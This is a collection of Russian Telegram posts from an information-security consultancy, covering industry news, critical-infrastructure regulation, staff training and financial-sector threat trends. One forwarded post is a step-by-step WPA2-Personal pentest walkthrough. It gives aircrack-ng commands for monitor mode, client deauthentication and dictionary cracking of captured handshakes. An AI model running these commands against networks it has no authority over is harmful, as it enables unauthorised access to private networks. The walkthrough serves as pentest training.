В свежем выпуске подкаста «Безопасный выход. Новости» эксперты AKTIV.CONSULTING — Владислав Крылов и Ольга Копейкина — обсудили, почему ИБ-рынок в России продолжает расти, кто стал жертвой громких атак и почему именно ИИ оказался в фокусе CFO.
В этом выпуске:
Смотреть на удобной платформе:
#подкаст #Безопасныйвыход #новости
Please open Telegram to view this post
VIEW IN TELEGRAM
❤7🔥6🆒4
В министерстве сообщили, что предложенные меры создадут многоуровневую систему защиты граждан в цифровой среде, а также подчеркнули, что все инициативы разрабатываются с учётом баланса безопасности и прав пользователей.
Дело в том, что одна из мер предполагает запрет на распространение информации о методах проведения кибератак наравне с экстремистским контентом.
Он позволит россиянам управлять информацией о себе: видеть, кому они дали разрешение на ее использование, и при необходимости легко его отзывать.
Рынок технологий искусственного интеллекта в 2025 году может вырасти на 25–30%, до 1,9 трлн рублей.
Сервис собирал массивы информации из утечек различных структур и предоставлял клиентам детальные досье на граждан — от паспортных и адресных сведений до данных о доходах, кредитной истории и месте работы.
Наиболее востребованы их услуги были у финтеха, госсектора и ИТ-компаний.
Власти ожидают, что это поможет бороться с получением злоумышленниками доступа к чужим аккаунтам.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2❤1
В ней уже собраны каналы игроков ИБ-рынка: ИнфоТеКС, Астрал.Безопасность, Axoft, РЕД СОФТ, RuSIEM, Echelon Eyes, Ideco, а также наш канал.
Актуальные новости ИБ – важные события отрасли, разборы атак и нововведений.
Практика и кейсы – проверенные методики защиты, обзоры инструментов и лайфхаки.
Обучение – статьи, вебинары и курсы для постоянного прокачивания знаний.
Добавить папку Инфобез!
Please open Telegram to view this post
VIEW IN TELEGRAM
👏5🤩5❤3
Ведь киберугрозы меняются быстрее, чем мы успеваем привыкнуть. Поэтому постоянное обучение в этой сфере стало необходимостью.
Компании всё активнее внедряют курсы, симуляции и вебинары, чтобы сотрудники могли развиваться и быть в курсе актуальных практик. Мы тоже делимся опытом на конференциях АБИСС, Сеймартек, АСУ ТП КВО и других отраслевых площадках.
А чтобы повышение квалификации сотрудников приносило реальную пользу, наш эксперт Евгения Горюнова выделяет пять ключевых направлений:
Базовых курсов уже мало. Нужны современные форматы: интерактивные тренинги, фишинг симуляции, вебинары экспертов. В фокусе актуальные угрозы: ransomware, атаки на цепочку поставок, социальная инженерия.
Теорию нужно закреплять опытом: участие во внедрении инструментов безопасности, учениях по реагированию на инциденты, анализе систем. Важно обмениваться знаниями на конференциях, в сообществах и на встречах с экспертами. Расширить кругозор помогает работа с менторами и консалтинговыми компаниями по ИБ.
Важно учитывать уровень знаний сотрудников. Техническим специалистам нужны углубленные курсы по пентесту, анализу кода и управлению инцидентами. Сотрудникам вне ИТ — тренинги по основам безопасности, распознаванию фишинга и работе с конфиденциальной информацией.
Киберугрозы растут, а методы реализации атак развиваются, поэтому обучение должно быть непрерывным. Эффективна система с короткими модулями, рассылками и доступом к актуальным ресурсам, которые помогают оставаться в курсе новых атак.
Важно проверять, как обучение влияет на сотрудников. Для этого используют тесты, опросы, киберобучения и анализ поведения, чтобы видеть изменения в осведомленности, навыках при соблюдении правил информационной безопасности.
Рекомендации
В следующем посте мы расскажем, как сотрудники нашей компании развивают экспертизу и передают практический опыт внутри и за ее пределами.
#Евгения_Горюнова
Please open Telegram to view this post
VIEW IN TELEGRAM
💯4👏1🆒1
🎓 Зачем киберпреступникам данные образовательных учреждений
Персональные данные учеников и сотрудников ценятся у злоумышленников. Их используют для оформления кредитов на «чистое имя» ребёнка, для шантажа родителей, а ещё для создания правдоподобных фишинговых атак. Например, письмо «от классного руководителя» с просьбой перевести деньги или дать доступ. Ну и, конечно, такие базы просто продают на чёрном рынке.
⚡️ Что могут сделать сами ученики и учителя
Учреждение должно строить основную защиту, но и пользователи могут помочь. Простая цифровая гигиена работает:
🛑 Использовать сложные (и уникальные) пароли,
🛑 Не переходить по подозрительным ссылкам в письмах и сообщениях WhatsApp, Telegram и Max,
🛑 Не передавать свои логины, пароли и другие чувствительные данные,
🛑 Устанавливать и обновлять средства защиты,
🛑 Быть бдительными и и помнить про фишинговые сайты.
🔍 Рост утечек в образовании: Россия и мир
Во многих странах утечек становится меньше, но в России их количество растёт. Причина — массовая цифровизация образования: электронные дневники, журналы, проекты вроде «Цифровой образовательной среды». Новые системы и точки входа стали привлекательной целью, но их защита во многих случаях осталась на базовом уровне.
#Дмитрий_Башков
👉 Подробный разбор с комментариями экспертов в материале ComNews
💬 Telegram | 💙 VK | 🌐 Сайт | 📹 Подкаст
В I полугодии 2025 года в России зафиксировали 18 утечек данных из образовательных учреждений. Это на 20% больше, чем за тот же период 2024 года.
Персональные данные учеников и сотрудников ценятся у злоумышленников. Их используют для оформления кредитов на «чистое имя» ребёнка, для шантажа родителей, а ещё для создания правдоподобных фишинговых атак. Например, письмо «от классного руководителя» с просьбой перевести деньги или дать доступ. Ну и, конечно, такие базы просто продают на чёрном рынке.
Учреждение должно строить основную защиту, но и пользователи могут помочь. Простая цифровая гигиена работает:
Во многих странах утечек становится меньше, но в России их количество растёт. Причина — массовая цифровизация образования: электронные дневники, журналы, проекты вроде «Цифровой образовательной среды». Новые системы и точки входа стали привлекательной целью, но их защита во многих случаях осталась на базовом уровне.
#Дмитрий_Башков
Please open Telegram to view this post
VIEW IN TELEGRAM
Для успешного управления и минимизации количества потенциальных инцидентов ИБ важно уметь определять недопустимые события для организации. Недопустимыми считаются события (либо их цепочка), которые:
К таким событиям можно отнести, например, остановку производства, подмену контента («дефейс»), полную или частичную потерю данных и т.д.
Переходя к финансовой оценке последствий от инцидента ИБ, важно понимать основные цели для расчета такого ущерба. Для чего необходимо считать ущерб:
Ущерб от инцидента может и должен быть рассчитан. Его реальный размер обычно выше первичных оценок. Грамотное управление рисками, декомпозиция ущерба и моделирование сценариев помогут существенно минимизировать последствия от инцидентов ИБ, а также не допустить их повторного возникновения.
#Сергей_Шлёнский
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2❤1
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Ассоциация АБИСС
4 сентября в 11:00 состоится вебинар «Защита КИИ. Практика», организованный ассоциацией АБИСС.
На вебинаре эксперты АБИСС обсудят практические аспекты защиты КИИ. Разберут ключевые шаги по защите ЗО КИИ (оценка текущего состояния, разработка защитных мер и их реализация), а также расскажут с какими проблемными вопросами при реализации системы обеспечения ИБ ЗО КИИ придется столкнуться на практике (несертифицированные средства защиты информации, встроенные меры защиты и безопасная разработка ПО).
ПРОГРАММА ВЕБИНАРА:
Тема: «Что делать, если ваша АСУ ТП является ЗО КИИ»:
Тема: «Проблематика реализации требований по защите КИИ»
ДЛЯ КОГО ВЕБИНАР:
РЕГИСТРАЦИЯ
Листок бюрократической защиты информации, АИС
Please open Telegram to view this post
VIEW IN TELEGRAM
❤8🔥5👍3
Сегодня поговорим об основных физических инструментах для работ по физическому пентесту, как части работ по RedTeam. И нет, затрагивать Flipper Zero мы не будем, а рассмотрим устройства, которые действительно используют этичные хакеры.
Что он позволяет делать:
Что он позволяет делать:
Что он позволяет делать:
Что он позволяет делать:
Вот мы и познакомились с основными физическими инструментами этичных хакеров. Конечно, это далеко не весь список из арсенала специалистов, существуют ещё направленные антены для тестирования Wi-Fi сетей, платы с микроконтройлерами со съёмной памятью и собственными антенами, а их формфактор может быть замаскирован даже под самый обычный USB-кабель, и прочие автономные устройства.
Помните, что все эти инструменты сами по себе не несут угрозы – всё зависит от целей их использования. Поэтому мы настоятельно рекомендуем учитывать законодательство при их использовании, а также не забывать про защиту самих устройств. А лучше, доверить работы по физическому пентесту экспертам.
#Артем_Храмых #пентест #анализ_защищенности #OSINT
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7👏1
Эксперты объясняют, что закон не разделяет звонки на типы, поэтому блокируются все обзвоны, которые идентифицируются как массовые.
Важно, что при этом информация должна исключить возможность прямой идентификации.
Под ИИ предложили понимать любую систему данных или софт, который сможет обрабатывать информацию способом, напоминающим разумное поведение.
Кроме того, Роскомнадзор с начала года заблокировал 1,7 тыс. интернет-ресурсов, которые использовались для неправомерного сбора, хранения и распространения ПДн.
Более чем в половине случаев атаки начинались с техники подбора или подстановки уже украденных логинов и паролей.
Эксперты отмечают, что исключение адресов таких операторов из общедоступных сведений реестра затруднит или сделает невозможным направление им обращений и запросов.
При этом почти в два раза выросло количество мошеннических звонков с международных номеров по сотовой связи.
Утечка корпоративных адресов электронной почты, которые работники часто используют для регистрации на личных и сторонних сервисах, может привести к взлому внутренних ИТ-систем бизнеса.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4👍1
Работа в финансовом секторе — это не только про цифры и ответственность за деньги, но и про защиту репутации, данных и клиентов.
Сегодняшние угрозы становятся всё сложнее, и именно CISO, ИБ-специалисты и команды ИТ вместе с финансистами стоят на страже устойчивости бизнеса.
На основе данных Банка России и анализа текущего ландшафта угроз мы выделили основные тренды, которые определяют потребности финансового сектора в консалтинговых услугах по информационной безопасности.
По данным ЦБ: в 2024 году было выявлено 17 инцидентов у ИТ-подрядчиков, которые затронули более 70 финансовых организаций. Основные векторы проникновения — компрометация учетных записей подрядчиков и эксплуатация уязвимостей в их инфраструктуре.
Консалтинговый запрос: аудит процессов управления доступом сторонних организаций, разработка регламентов и методологии оценки рисков для подрядчиков.
По данным ЦБ: злоумышленники массово перешли на использование легитимных инструментов для туннелирования трафика — Ngrok, Cloudflare Tunnel, GSocket, Microsoft Dev Tunnels. Это делает их активность практически неотличимой от обычного служебного трафика.
Консалтинговый запрос: аудит сетевой архитектуры на предмет рисков организации скрытых каналов, разработка сценариев обнаружения аномальной сетевой активности.
По данным ЦБ: в среднем между публикацией PoC-эксплойта и первой атакой проходит менее 22 минут. При этом фиксируются случаи, когда системы были скомпрометированы за месяцы до начала активных действий злоумышленников (dwell time).
Консалтинговый запрос: внедрение процессов оперативного управления уязвимостями, приоритизация угроз, обязательный постинцидентный анализ.
По данным ЦБ: наблюдается рост атак с IP-адресов российских хостинг-провайдеров и мобильных операторов. Такой трафик часто воспринимается как легитимный.
Консалтинговый запрос: аудит и пересмотр правил безопасности периметра, сценарии поведенческого анализа внутреннего трафика.
По данным ЦБ: после блокировок телефонных мошенников злоумышленники перешли на звонки через мессенджеры. Актуальные сценарии — полисы, запись в поликлинику, «служба безопасности банка», вредоносные документы.
Консалтинговый запрос: обучение сотрудников и клиентов, моделирование целевых фишинговых атак.
По данным ЦБ: специалисты ФинЦЕРТ в ходе расследований выявляли, что информационные системы были скомпрометированы за несколько месяцев до начала активных действий. Злоумышленники оставляют в системах backdoor и веб-оболочки (Web shell) для сохранения доступа даже после устранения уязвимости. Устранение уязвимости не гарантирует безопасности системы, если не проведен тщательный постинцидентный анализ на наличие этих следов.
Консалтинговый запрос: проактивные расследования, ретроспективный анализ систем, поиск признаков скрытых каналов и незамеченных векторов доступа.
#Дмитрий_Башков
Please open Telegram to view this post
VIEW IN TELEGRAM
В условиях санкций и запрета иностранного ПО на объектах критической инфраструктуры (КИИ) компании топливно-энергетического комплекса (ТЭК) решают задачу не только соответствия требованиям, но и сохранения устойчивости своих промышленных ИС.
Многие системы в ТЭК десятилетиями разрабатывались на Java. После ухода Oracle и обострения рисков (блокировка обновлений, утечки, отключения) выбор пал на российские дистрибутивы Java, в первую очередь — Axiom JDK. Он включён в реестр Минцифры и сертифицирован ФСТЭК. Это позволило компаниям не переписывать код с нуля, сохранить производительность и соответствовать требованиям.
В России зарегистрировано более 50 000 объектов КИИ, из них более 70% — в ТЭК (по оценке Центра компетенций по цифровой экономике).
В августе 2023 года Минэнерго РФ утвердило перечень из 30 типовых отраслевых объектов КИИ — от систем управления скважинами и нефтебазами до установок крекинга и газораспределительных систем.
Согласно указу Президента РФ №250 от 01.05.2022, с 1 января 2025 года запрещено использовать иностранное ПО на объектах КИИ, если существует российский аналог, включённый в реестр Минцифры. Запрет распространяется и на open source, если он не зарегистрирован в реестре.
Федеральный закон 187-ФЗ требует обеспечить устойчивость и защищённость значимых объектов КИИ, исключив неконтролируемое воздействие на технические средства, которое может нарушить или остановить работу таких объектов.
Большинство ИС в ТЭК исторически создавались на Java (языке, обеспечивающем кроссплатформенность, масштабируемость и гибкость). Переход на российские JDK из реестра Минцифры позволяет:
Так, Java по-прежнему остаётся зрелой, производительной технологией с широкой экспертизой и поддержкой на российском рынке.
Источник: ComNews
Please open Telegram to view this post
VIEW IN TELEGRAM
💯5👍4🔥3
В одном из недавних выпусков подкаста мы говорили о том, кто такой современный CISO, какую роль он играет в компании и с какими вызовами сталкивается. Гостем выпуска стал Георгий Руденко (ex.Сбер, ex.Альфа-Банк), а сейчас директор по информационной безопасности в одном из крупнейших банков и номинант рейтинга Forbes «30 до 30».
🔗 Выпуск подкаста «Кто такой современный CISO и какую роль он играет в компании». Смотреть.
👉 За пределами подкаста Георгий делится своими мыслями и опытом в личном Telegram-блоге — Георгий Руденко | Кибербез & Бизнес.
В канале можно найти:
Подписывайтесь и загляните в архив, там много полезного
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6🤩6❤3🆒3👏1
Продолжаем разбираться, как оценить финансовый ущерб от инцидента ИБ в организации.
Что будет, если завтра случится серьёзный инцидент ИБ? Сможете ли вы точно оценить ущерб или понять, сколько это будет стоить бизнесу. Чтобы не гадать, нужно понимать: где вы находитесь на шкале зрелости информационной безопасности.
Выделяется пять ключевых уровней зрелости:
Для повышения уровня зрелости необходимо опираться на накопленный опыт и использовать международную и отечественную правовую базу.
В этом помогут проверенные фреймворки и методологии:
#Сергей_Шлёнский
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7👍2👏1
VK Видео
Вебинар №11 Защита КИИ. Практика
Вебинар №11 «Защита КИИ. Практика» На вебинаре эксперты АБИСС обсудят практические аспекты защиты КИИ. Разберут ключевые шаги по защите ЗО КИИ (оценка текущего состояния, разработка защитных мер и их реализация), а также расскажут с какими проблемными вопросами…
⭐️ Доступна запись Вебинара №11 "Защита КИИ. Практика"
В записи вебинара, где спикером выступил наш эксперт Владислав Крылов — конкретные кейсы, разбор ошибок и чек-листы для внедрения. Не теория, а только то, что работает здесь и сейчас.
И вот несколько моментов, на которые мы хотим обратить ваше внимание по итогам вебинара:
📃 58-ФЗ, отраслевые нюансы: категорирование стало проще или усложнилось?
Категорирование АСУ ТП как объектов КИИ — это не шаблонная задача. Энергетика, нефтегаз, металлургия — в каждой отрасли свои риски и индивидуальные системы, под каждую необходим свой расчет критериев значимости. Да и ко всему, появился ряд документов (пусть отчасти и проектов), меняющих уже устоявшуюся годами процедуру категорирования. Голова идет кругом, не так ли?
🔓 RBAC в АСУ ТП: не «можно», а «обязательно»
Минимальные привилегии, блокировка неактивных учёток, динамическое изменение прав — это не обязательные требования, закреплённые в отраслевых стандартах и регуляторных документах, а "правила хорошего тона" при реализации СОИБ АСУ ТП. Например, модель RBAC исключает ситуации, когда инженер-наладчик получает несанкционированный доступ к настройкам критических параметров ПЛК из-за избыточных прав.
Игнорирование этих мер — прямая дорога к инцидентам, где человеческая ошибка или злой умысел могут остановить производство на часы или даже дни.
⚠️ Двухфакторка на АСУ ТП: не паранойя, а стандарт
Токен + пароль — это минимум, который отсекает 90% атак брутфорсом. Локальный вход в HMI-панель требует смарт-карты и PIN-кода, чтобы даже физический доступ злоумышленника к оборудованию не гарантировал ему контроль. Реализация 2FA в АСУ ТП — это не «гипертрофированная осторожность», а базовый уровень защиты, который уже внедряют лидеры промышленности, от нефтеперерабатывающих заводов до атомных станций.
Готовы разобрать всё по шагам? Переходите по ссылке ниже:
📺 VK Видео
#Владислав_Крылов
💬 Telegram | 💙 VK | 🌐 Сайт | 📹 Подкаст
В записи вебинара, где спикером выступил наш эксперт Владислав Крылов — конкретные кейсы, разбор ошибок и чек-листы для внедрения. Не теория, а только то, что работает здесь и сейчас.
И вот несколько моментов, на которые мы хотим обратить ваше внимание по итогам вебинара:
Категорирование АСУ ТП как объектов КИИ — это не шаблонная задача. Энергетика, нефтегаз, металлургия — в каждой отрасли свои риски и индивидуальные системы, под каждую необходим свой расчет критериев значимости. Да и ко всему, появился ряд документов (пусть отчасти и проектов), меняющих уже устоявшуюся годами процедуру категорирования. Голова идет кругом, не так ли?
Минимальные привилегии, блокировка неактивных учёток, динамическое изменение прав — это не обязательные требования, закреплённые в отраслевых стандартах и регуляторных документах, а "правила хорошего тона" при реализации СОИБ АСУ ТП. Например, модель RBAC исключает ситуации, когда инженер-наладчик получает несанкционированный доступ к настройкам критических параметров ПЛК из-за избыточных прав.
Игнорирование этих мер — прямая дорога к инцидентам, где человеческая ошибка или злой умысел могут остановить производство на часы или даже дни.
Токен + пароль — это минимум, который отсекает 90% атак брутфорсом. Локальный вход в HMI-панель требует смарт-карты и PIN-кода, чтобы даже физический доступ злоумышленника к оборудованию не гарантировал ему контроль. Реализация 2FA в АСУ ТП — это не «гипертрофированная осторожность», а базовый уровень защиты, который уже внедряют лидеры промышленности, от нефтеперерабатывающих заводов до атомных станций.
Готовы разобрать всё по шагам? Переходите по ссылке ниже:
#Владислав_Крылов
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6 5❤3👍1🆒1
Они публикуют практические кейсы, делают интересные ресёрчи и умеют просто объяснять сложные темы. Иногда добавляют иронии, но ровно столько, чтобы материал оставался профессиональным и полезным.
Если хотите расширить свой кругозор в области ИБ — рекомендуем обратить внимание.
👇 Ниже один из их свежих разборов. На этот раз по пентесту Wi-Fi сетей (WPA2 Personal).
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4🆒4
Forwarded from REDtalk (Mister Fox)
Всем привет! 👋 Сегодня немного поговорим о том, как пентестить Wi-Fi сети, а именно WPA2 Personal. Берите чашечку кофе и присаживайтесь.☕️
WPA2 Personal🐈⬛
Самый популярный протокол, используемый в персональных сетях Wi-Fi на данный момент, — это WPA2. Новая версия, WPA3, постепенно отвоёвывает себе место под солнцем👊 , но всё ещё встречается гораздо реже. Более старые протоколы WEP и WPA практически не используются.
🔘 Первым типом атаки на WPA2, который рассмотрим, является перехват handshake, во время которого клиент и точка доступа обмениваются ключами.🔑
Для данной атаки будем использовать утилиты семейства aircrack-ng (также можно использовать утилиту airgeddon для удобства).
🔹 Для начала необходимо включить режим мониторинга сети у интерфейса:
Иногда может выскакивать сообщенияу с просьбой “убить” процессы, которые могут помещать перевести наш интерфейс в режим мониторинга.
Для этого достаточно ввести команду
🔹 Следующим шагом будем поиск доступных сетей Wi-Fi и клиентов. Сделать это можно будет с помощью утилиты airodump-ng. Флаг -w позволит сохранит результаты сканирования.
🔹 Иногда полезно посмотреть карту точек доступа и подключенных к ним клиентов, чтобы понять на какую точку доступа нам нацелиться. Сделать это можно с помощью утилиты airgraph-ng. В параметрах передаем тип изображения, который хотим сохранить, а также файл с результатами сканирования:
После определения нашей цели мы можем подождать пока кто-то подключиться к точке доступа или же начать деаутентификацию клиентов уже подключенных к точке.
🔹 Для начала настроим airodump на захват пакетов с определенной точки доступа и канала:
🔹 Деаутентификацию клиентов выполним с помощью утилиты aireplay-ng:
Это заставит клиента переподключиться к точке доступа, что позволит нам перехватить handshake.📞
После захвата handshake airodump-ng выведет соответствующее сообщение:
🔹 Однако не стоит сразу сломя голову начать брутить handshake. Очень часто утилита airodump захватывает не все нужные нам пакеты (а их 4). Поэтому стоит взглянуть на захваченный файл и проверить, а все ли дома. Сделать это можно в ручную с помощью Wireshark или с помощью утилит cowpatty.
Данное сообщение означает, что все в порядке и можем смело брутить наш файл.
🔹 Для брутфорсе захваченного handshake подойдет cowpatty или aircrack-ng.
WPA2 Personal
Самый популярный протокол, используемый в персональных сетях Wi-Fi на данный момент, — это WPA2. Новая версия, WPA3, постепенно отвоёвывает себе место под солнцем
🔘 Первым типом атаки на WPA2, который рассмотрим, является перехват handshake, во время которого клиент и точка доступа обмениваются ключами.
Для данной атаки будем использовать утилиты семейства aircrack-ng (также можно использовать утилиту airgeddon для удобства).
🔹 Для начала необходимо включить режим мониторинга сети у интерфейса:
sudo airmon-ng start wlan0
Иногда может выскакивать сообщенияу с просьбой “убить” процессы, которые могут помещать перевести наш интерфейс в режим мониторинга.
Для этого достаточно ввести команду
airmon-ng check kill.🔹 Следующим шагом будем поиск доступных сетей Wi-Fi и клиентов. Сделать это можно будет с помощью утилиты airodump-ng. Флаг -w позволит сохранит результаты сканирования.
sudo airodump-ng wlan0mon -c 1 -w NETWORK
🔹 Иногда полезно посмотреть карту точек доступа и подключенных к ним клиентов, чтобы понять на какую точку доступа нам нацелиться. Сделать это можно с помощью утилиты airgraph-ng. В параметрах передаем тип изображения, который хотим сохранить, а также файл с результатами сканирования:
sudo airgraph-ng -i NETWORK.csv -g CAPR -o NETWORK.png
После определения нашей цели мы можем подождать пока кто-то подключиться к точке доступа или же начать деаутентификацию клиентов уже подключенных к точке.
🔹 Для начала настроим airodump на захват пакетов с определенной точки доступа и канала:
sudo airodump-ng -c 11 wlan0mon --essid wifinet -w NETWORK
🔹 Деаутентификацию клиентов выполним с помощью утилиты aireplay-ng:
sudo aireplay-ng -0 5 -a 60:3E:41:FE:30:83 -c 5C:12:B1:9B:ED:1A wlan0mon
Это заставит клиента переподключиться к точке доступа, что позволит нам перехватить handshake.
После захвата handshake airodump-ng выведет соответствующее сообщение:
kali@kali[/wifi]$ airodump-ng wlan0mon -c 1 -w NETWORK
06:11:03 Created capture file "NETWORK.cap".
🔹 Однако не стоит сразу сломя голову начать брутить handshake. Очень часто утилита airodump захватывает не все нужные нам пакеты (а их 4). Поэтому стоит взглянуть на захваченный файл и проверить, а все ли дома. Сделать это можно в ручную с помощью Wireshark или с помощью утилит cowpatty.
kali@kali[/wifi]$ cowpatty -c -r NETWORK
capcowpatty 4.8 - WPA-PSK dictionary attack. <jwright@hasborg.com>
Collected all necessary data to mount crack against WPA2/PSK passphrase.
Данное сообщение означает, что все в порядке и можем смело брутить наш файл.
🔹 Для брутфорсе захваченного handshake подойдет cowpatty или aircrack-ng.
sudo aircrack-ng -w wordlist.txt -0 NETWORK.cap
Please open Telegram to view this post
VIEW IN TELEGRAM
🆒6👍2❤1
Актуальная редакция Доктрины была утверждена указом президента в декабре 2016 года.
В перечень планируют включить 57 сервисов, среди которых крупнейшие банки, портал «Госуслуг», поисковые системы и т.д.
ИИ анализирует запланированные мероприятия, процессы их выполнения и прогнозирует риски (точность такого прогноза уже достигает 96%).
Согласно результатам пентестов, проведённых сотовым оператором в 2025 году, уязвимостям высокого и критического уровней в защите своих информационных систем подвержено 60% компаний.
При этом расчётное число сотрудников, которых понадобилось бы привлечь для тех же проектов или задач, возросло более чем в 10 раз.
Основные причины дисбаланса: трансформация бизнес-потребностей в сторону дефицитных навыков, необходимость работы с российскими технологическими стеками и недостаток квалифицированных инженеров.
Уже 48% финансовых организаций начали внедрять ИИ-решения, однако 70% неудач связаны с фундаментальной неготовностью бизнеса к изменениям и подходом к ИИ как к ИТ-инструменту.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3